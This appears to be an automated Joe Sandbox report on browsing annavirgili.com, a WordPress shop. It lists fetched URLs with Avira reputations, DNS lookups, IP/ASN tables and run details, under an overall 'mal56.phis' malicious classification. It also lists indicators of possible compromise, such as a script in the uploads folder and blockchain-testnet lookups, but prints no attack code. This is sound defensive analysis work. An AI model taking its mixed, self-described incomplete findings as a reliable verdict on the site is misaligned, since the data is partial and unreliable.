        https://annavirgili.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.min.js?ver=3.6.40%Avira URL Cloudsafe
        https://annavirgili.com/feed/0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/uploads/2024/09/Asset-2@4x.png0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/uploads/elementor/css/post-8052462589213.css?ver=17331263500%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.7.0-wc.6.6.10%Avira URL Cloudsafe
        https://annavirgili.com/contatti/0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.6.10%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=3.3.00%Avira URL Cloudsafe
        https://annavirgili.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac60%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/uploads/2021/10/cropped-Progetto-senza-titolo-2021-10-27T000238.589-1-32x32.png0%Avira URL Cloudsafe
        https://annavirgili.com/wp-includes/js/jquery/ui/effect-fold.min.js?ver=1.13.30%Avira URL Cloudsafe
        https://annavirgili.com0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.j0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/image/js/html_types/image0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=3.3.00%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/themes/ciena/assets/js/mega-menu.js?ver=1.0.80%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/fami-templatekits/assets/js/fmtpl-addons.js?ver=1.0.40%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/uploads/2022/10/SLIDER-HOME-AVmob.jpg0%Avira URL Cloudsafe
        http://james.padolsey.com/javascript/get-document-height-cross-browser/0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/themes/ciena/inc/elementor/widgets/assets/js/fmtpl_theme_elemento0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/themes/ciena/inc/elementor/widgets/assets/css/category_bg.css?ver=1.0.80%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/themes/ciena/inc/elementor/widgets/assets/css/category_bg.css?ver0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/themes/ciena/assets/vendors/js-offcanvas/js-offcanvas.css?ver=1.2.90%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.jquery.js?ver=3.3.00%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/img/minus.svg0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/themes/ciena/assets/css/main_color.css?ver=1.0.80%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/img/plus.svg0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=6.6.10%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=0%Avira URL Cloudsafe
        https://annavirgili.com/about/0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=6.6.10%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/tooltip/js/tooltipster.bundle.min.js?ver=3.3.00%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/accounting/accounting.min.js?ver=0.4.20%Avira URL Cloudsafe
        https://annavirgili.com/av-401/0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?v0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/tooltip/css/plugins/tooltipster/sideTip/themes/tooltipster-sideTip-noir.min.css?ver=3.3.00%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.60%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.min.j0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/uploads/2022/10/SLIDER-HOME-AV-scaled.jpg0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendors-style.css?ver=7.6.20%Avira URL Cloudsafe
        https://annavirgili.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e60%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        star-mini.c10r.facebook.com
        157.240.196.35
        truefalse
          high
          annavirgili.com
          147.135.166.53
          truefalse
            unknown
            mc.yandex.ru
            93.158.134.119
            truefalse
              high
              scontent.xx.fbcdn.net
              157.240.196.15
              truefalse
                high
                pacman-content-live.live.eks.hotjar.com
                108.128.190.134
                truefalse
                  high
                  vc-live-cf.hotjar.io
                  18.66.161.61
                  truefalse
                    high
                    script.hotjar.com
                    13.227.8.16
                    truefalse
                      high
                      a37dd8b3f3000a75e.awsglobalaccelerator.com
                      15.197.152.159
                      truefalse
                        unknown
                        www.google.com
                        142.250.181.100
                        truefalse
                          high
                          wsky-live.live.eks.hotjar.com
                          34.240.184.84
                          truefalse
                            high
                            static-cdn.hotjar.com
                            108.158.75.113
                            truefalse
                              high
                              www.facebook.com
                              unknown
                              unknownfalse
                                high
                                data-seed-prebsc-1-s1.bnbchain.org
                                unknown
                                unknownfalse
                                  high
                                  srtb.msn.com
                                  unknown
                                  unknownfalse
                                    high
                                    mc.yandex.com
                                    unknown
                                    unknownfalse
                                      high
                                      connect.facebook.net
                                      unknown
                                      unknownfalse
                                        high
                                        cxcs.microsoft.net
                                        unknown
                                        unknownfalse
                                          high
                                          use.fontawesome.com
                                          unknown
                                          unknownfalse
                                            high
                                            vc.hotjar.io
                                            unknown
                                            unknownfalse
                                              high
                                              content.hotjar.io
                                              unknown
                                              unknownfalse
                                                high
                                                static.hotjar.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  _8545._https.data-seed-prebsc-1-s1.bnbchain.org
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    ws.hotjar.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      NameMaliciousAntivirus DetectionReputation
                                                      https://annavirgili.com/wp-content/themes/ciena/assets/css/customize.css?ver=1.0.8false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://annavirgili.com/wp-content/themes/ciena/inc/elementor/widgets/assets/js/fmtpl_theme_elementor.js?ver=1.0.8false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://content.hotjar.io/?site_id=3301862&gzip=1false
                                                        high
                                                        https://annavirgili.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.6.4false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.6.6.1false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://annavirgili.com/wp-content/plugins/gtranslate/flags/16/it.pngfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://annavirgili.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=6.6.1false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/label/css/html_types/label.css?ver=3.3.0false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://annavirgili.com/wp-content/themes/ciena/assets/js/theme.js?ver=1.0.8false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://mc.yandex.com/watch/99162160?page-url=https%3A%2F%2Fannavirgili.com%2F&charset=utf-8&hittoken=1734004723_f22d338d7326eecdda965bd2d1cb1fa1edecb39f3c85d99d4243c64f8957864b&browser-info=nb%3A1%3Acl%3A7968%3Aar%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1541%3Acn%3A1%3Adp%3A1%3Als%3A248137426931%3Ahid%3A282929742%3Az%3A-300%3Ai%3A20241212065851%3Aet%3A1734004732%3Ac%3A1%3Arn%3A137987032%3Arqn%3A3%3Au%3A1734004717472745876%3Aw%3A1263x889%3As%3A1280x1024x24%3Ask%3A1%3Awv%3A2%3Ads%3A%2C%2C%2C%2C%2C%2C%2C48851%2C135%2C%2C%2C%2C54473%3Aco%3A0%3Acpf%3A1%3Aeu%3A2%3Ans%3A1734004675978%3Agi%3AR0ExLjEuNTI4NjM2NDI5LjE3MzQwMDQ3MDc%3D%3Arqnl%3A1%3Ast%3A1734004732&t=gdpr(14)mc(g-1)clc(0-0-0)rqnt(3)aw(1)rcm(1)cdl(na)eco(42009088)dss(2)ti(0)&force-urlencoded=1false
                                                          high
                                                          https://annavirgili.com/wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-brands-400.woff2false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://annavirgili.com/wp-content/uploads/fgcheck.min.js?ver=1.0false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://annavirgili.com/wp-content/plugins/revslider/public/assets/assets/loader.giffalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/image/css/html_types/image.css?ver=3.3.0false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://annavirgili.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.6.1false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.facebook.com/tr/?id=157851312877398&ev=AdvancedEvents&dl=https%3A%2F%2Fannavirgili.com%2F&rl=&if=false&ts=1734004731328&cd[login_status]=not_logged_in&cd[post_type]=page&cd[object_id]=8052462589213&cd[object_type]=home&cd[userAgent]=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F131.0.0.0%20Safari%2F537.36&cd[language]=en-US&cd[referrer]=&sw=1280&sh=1024&v=2.9.178&r=stable&a=woocommerce-6.6.1-3.2.1&ec=1&o=4126&fbp=fb.1.1734004731321.484884742687228415&ler=empty&cdl=API_unavailable&it=1734004713411&coo=false&rqm=GETfalse
                                                            high
                                                            https://annavirgili.com/wp-content/plugins/fami-templatekits/assets/css/fmtpl-menu.css?ver=1.0.4false
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://mc.yandex.ru/metrika/tag.jsfalse
                                                              high
                                                              https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/html_types/select.js?ver=3.3.0false
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://annavirgili.com/wp-content/uploads/2024/09/Asset-2@4x.pngfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://annavirgili.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.min.js?ver=3.6.4false
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.7.0-wc.6.6.1false
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://annavirgili.com/wp-content/uploads/elementor/css/post-8052462589213.css?ver=1733126350false
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://annavirgili.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.6.1false
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=3.3.0false
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://annavirgili.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6false
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://annavirgili.com/wp-content/uploads/2021/10/cropped-Progetto-senza-titolo-2021-10-27T000238.589-1-32x32.pngfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://connect.facebook.net/signals/config/157851312877398?v=2.9.178&r=stable&domain=annavirgili.com&hme=28abfdc7e582ae2a8fdd6ac5ebb406923cf601dc2ee488049b0628e75e0f6b36&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113false
                                                                high
                                                                https://annavirgili.com/wp-includes/js/jquery/ui/effect-fold.min.js?ver=1.13.3false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://annavirgili.com/wp-content/themes/ciena/assets/js/mega-menu.js?ver=1.0.8false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=3.3.0false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://annavirgili.com/wp-content/plugins/fami-templatekits/assets/js/fmtpl-addons.js?ver=1.0.4false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://annavirgili.com/wp-content/uploads/2022/10/SLIDER-HOME-AVmob.jpgfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://annavirgili.com/wp-content/themes/ciena/inc/elementor/widgets/assets/css/category_bg.css?ver=1.0.8false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.jquery.js?ver=3.3.0false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://annavirgili.com/wp-content/themes/ciena/assets/vendors/js-offcanvas/js-offcanvas.css?ver=1.2.9false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://annavirgili.com/wp-content/themes/ciena/assets/css/main_color.css?ver=1.0.8false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=6.6.1false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=6.6.1false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/tooltip/js/tooltipster.bundle.min.js?ver=3.3.0false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/accounting/accounting.min.js?ver=0.4.2false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://annavirgili.com/wp-content/uploads/2022/10/SLIDER-HOME-AV-scaled.jpgfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/tooltip/css/plugins/tooltipster/sideTip/themes/tooltipster-sideTip-noir.min.css?ver=3.3.0false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://annavirgili.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://annavirgili.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://annavirgili.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendors-style.css?ver=7.6.2false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                https://annavirgili.com/wp-content/uploads/2022/10/Progetto-senza-titolo-2024-09-04T092536.181-1000xchromecache_474.1.drfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://stats.g.doubleclick.net/g/collectchromecache_299.1.dr, chromecache_432.1.drfalse
                                                                  high
                                                                  https://annavirgili.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.chromecache_474.1.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://annavirgili.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fannavirgili.com%2Fchromecache_474.1.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://annavirgili.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.chromecache_474.1.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://annavirgili.com/trasparenza/chromecache_474.1.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://annavirgili.com/wp-content/themes/ciena/assets/vendors/js-offcanvas/js-offcanvas.pkgd.min.jschromecache_474.1.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://annavirgili.com/wp-content/uploads/2022/10/Home-3-1-300x193.jpgchromecache_474.1.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://github.com/select2/select2/blob/master/LICENSE.mdchromecache_382.1.dr, chromecache_340.1.drfalse
                                                                    high
                                                                    https://annavirgili.com/wp-content/uploads/2022/10/Progetto-senza-titolo-2024-09-04T092536.181-1024xchromecache_474.1.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://wordpress.org/support/topic/javascript-error-in-frontjs?replies=1chromecache_296.1.dr, chromecache_312.1.drfalse
                                                                      high
                                                                      https://fontawesome.comchromecache_300.1.dr, chromecache_260.1.drfalse
                                                                        high
                                                                        http://www.opensource.org/licenses/mit-license.phpchromecache_386.1.dr, chromecache_418.1.drfalse
                                                                          high
                                                                          https://github.com/twbs/bootstrap/graphs/contributors)chromecache_220.1.dr, chromecache_291.1.drfalse
                                                                            high
                                                                            https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/img/delete.png);background-sichromecache_474.1.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.themepunch.com/support-centerchromecache_414.1.dr, chromecache_339.1.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/chromecache_474.1.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://annavirgili.com/xmlrpc.php?rsdchromecache_474.1.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://ns.attribution.com/ads/1.0/chromecache_424.1.dr, chromecache_463.1.drfalse
                                                                              high
                                                                              https://annavirgili.com/privacy-policy/chromecache_474.1.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://annavirgili.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.csschromecache_474.1.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://annavirgili.com/monogram/chromecache_474.1.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/css/ion.rchromecache_474.1.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://cdn.gtranslate.net/flags/chromecache_338.1.dr, chromecache_263.1.drfalse
                                                                                high
                                                                                https://annavirgili.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=chromecache_474.1.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://annavirgili.com/wp-json/chromecache_474.1.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://annavirgili.com/feed/chromecache_474.1.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://annavirgili.com/contatti/chromecache_474.1.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://connect.facebook.net/chromecache_453.1.dr, chromecache_330.1.drfalse
                                                                                  high
                                                                                  https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.jchromecache_474.1.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://greensock.com/standard-licensechromecache_308.1.dr, chromecache_283.1.drfalse
                                                                                    high
                                                                                    https://annavirgili.comchromecache_474.1.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/image/js/html_types/imagechromecache_474.1.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://annavirgili.com/wp-content/themes/ciena/inc/elementor/widgets/assets/js/fmtpl_theme_elementochromecache_474.1.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://malsup.com/jquery/block/chromecache_386.1.dr, chromecache_418.1.drfalse
                                                                                      high
                                                                                      http://james.padolsey.com/javascript/get-document-height-cross-browser/chromecache_336.1.dr, chromecache_334.1.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://stackoverflow.com/questions/814613/how-to-read-get-data-from-a-url-using-javascriptchromecache_296.1.dr, chromecache_312.1.drfalse
                                                                                        high
                                                                                        https://annavirgili.com/wp-content/themes/ciena/inc/elementor/widgets/assets/css/category_bg.css?verchromecache_474.1.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_220.1.dr, chromecache_291.1.dr, chromecache_315.1.drfalse
                                                                                          high
                                                                                          https://github.com/js-cookie/js-cookiechromecache_258.1.dr, chromecache_431.1.drfalse
                                                                                            high
                                                                                            https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/img/minus.svgchromecache_474.1.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/img/plus.svgchromecache_474.1.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=chromecache_474.1.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://gtranslate.comchromecache_349.1.dr, chromecache_338.1.dr, chromecache_263.1.dr, chromecache_440.1.drfalse
                                                                                              high
                                                                                              https://annavirgili.com/about/chromecache_474.1.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://jqueryui.comchromecache_306.1.dr, chromecache_228.1.dr, chromecache_364.1.dr, chromecache_399.1.drfalse
                                                                                                high
                                                                                                https://github.com/kvz/phpjs/blob/master/functions/strings/number_format.jschromecache_296.1.dr, chromecache_312.1.drfalse
                                                                                                  high
                                                                                                  http://swiperjs.comchromecache_456.1.dr, chromecache_422.1.dr, chromecache_401.1.drfalse
                                                                                                    high
                                                                                                    https://annavirgili.com/av-401/chromecache_474.1.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://annavirgili.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?vchromecache_474.1.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://twitter.com/intent/tweet?text=chromecache_417.1.dr, chromecache_470.1.drfalse
                                                                                                      high
                                                                                                      https://www.instagram.com/anna.virgili/chromecache_474.1.drfalse
                                                                                                        high
                                                                                                        https://annavirgili.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.min.jchromecache_474.1.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://fontawesome.com/license/freechromecache_300.1.dr, chromecache_260.1.drfalse
                                                                                                          high
                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs
                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          147.135.166.53
                                                                                                          annavirgili.comFrance
                                                                                                          16276OVHFRfalse
                                                                                                          108.128.190.134
                                                                                                          pacman-content-live.live.eks.hotjar.comUnited States
                                                                                                          16509AMAZON-02USfalse
                                                                                                          172.217.19.164
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          87.250.250.119
                                                                                                          unknownRussian Federation
                                                                                                          13238YANDEXRUfalse
                                                                                                          108.158.75.87
                                                                                                          unknownUnited States
                                                                                                          16509AMAZON-02USfalse
                                                                                                          18.66.161.61
                                                                                                          vc-live-cf.hotjar.ioUnited States
                                                                                                          3MIT-GATEWAYSUSfalse
                                                                                                          93.158.134.119
                                                                                                          mc.yandex.ruRussian Federation
                                                                                                          13238YANDEXRUfalse
                                                                                                          87.250.251.119
                                                                                                          unknownRussian Federation
                                                                                                          13238YANDEXRUfalse
                                                                                                          13.227.8.35
                                                                                                          unknownUnited States
                                                                                                          16509AMAZON-02USfalse
                                                                                                          108.158.75.113
                                                                                                          static-cdn.hotjar.comUnited States
                                                                                                          16509AMAZON-02USfalse
                                                                                                          13.227.8.16
                                                                                                          script.hotjar.comUnited States
                                                                                                          16509AMAZON-02USfalse
                                                                                                          34.240.184.84
                                                                                                          wsky-live.live.eks.hotjar.comUnited States
                                                                                                          16509AMAZON-02USfalse
                                                                                                          15.197.152.159
                                                                                                          a37dd8b3f3000a75e.awsglobalaccelerator.comUnited States
                                                                                                          7430TANDEMUSfalse
                                                                                                          142.250.181.100
                                                                                                          www.google.comUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          157.240.196.15
                                                                                                          scontent.xx.fbcdn.netUnited States
                                                                                                          32934FACEBOOKUSfalse
                                                                                                          157.240.196.35
                                                                                                          star-mini.c10r.facebook.comUnited States
                                                                                                          32934FACEBOOKUSfalse
                                                                                                          IP
                                                                                                          192.168.2.24
                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1573651
                                                                                                          Start date and time:2024-12-12 12:56:59 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 3m 55s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:browseurl.jbs
                                                                                                          Sample URL:http://annavirgili.com
                                                                                                          Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                                                                                                          Number of analysed new started processes analysed:14
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Detection:MAL
                                                                                                          Classification:mal56.phis.win@18/423@55/17
                                                                                                          • Exclude process from analysis (whitelisted): audiodg.exe, dllhost.exe, SIHClient.exe, backgroundTaskHost.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 204.79.197.203, 23.32.238.192, 142.250.181.99, 172.217.17.78, 64.233.163.84, 142.250.181.142, 172.217.17.46, 142.250.181.104, 172.217.19.234, 142.250.181.67, 199.232.210.172, 172.67.142.245, 104.21.27.152, 172.217.21.42, 142.250.181.106, 172.217.19.170, 142.250.181.138, 216.58.208.234, 172.217.17.42, 172.217.17.74, 142.250.181.74, 142.250.181.42, 172.217.19.202, 172.217.19.238, 172.217.17.35, 172.217.19.10, 20.223.35.26, 23.219.82.75, 104.70.121.216, 4.175.87.197
                                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, use.fontawesome.com.cdn.cloudflare.net, cxcs.microsoft.net, clients2.google.com, redirector.gvt1.com, www.googletagmanager.com, th.bing.com, update.googleapis.com, c.pki.goog, www.google-analytics.com, www.bing.com, assets.msn.com, fonts.googleapis.com, accounts.google.com, content-autofill.googleapis.com, fonts.gstatic.com, a-0003.a-msedge.net, fd.api.iris.microsoft.com, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, www.googleapis.com, aefd.nelreports.net, x1.c.lencr.org, edgedl.me.gvt1.com, translate.googleapis.com, clients.l.google.com
                                                                                                          • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report size exceeded maximum capacity and may have missing network information.
                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
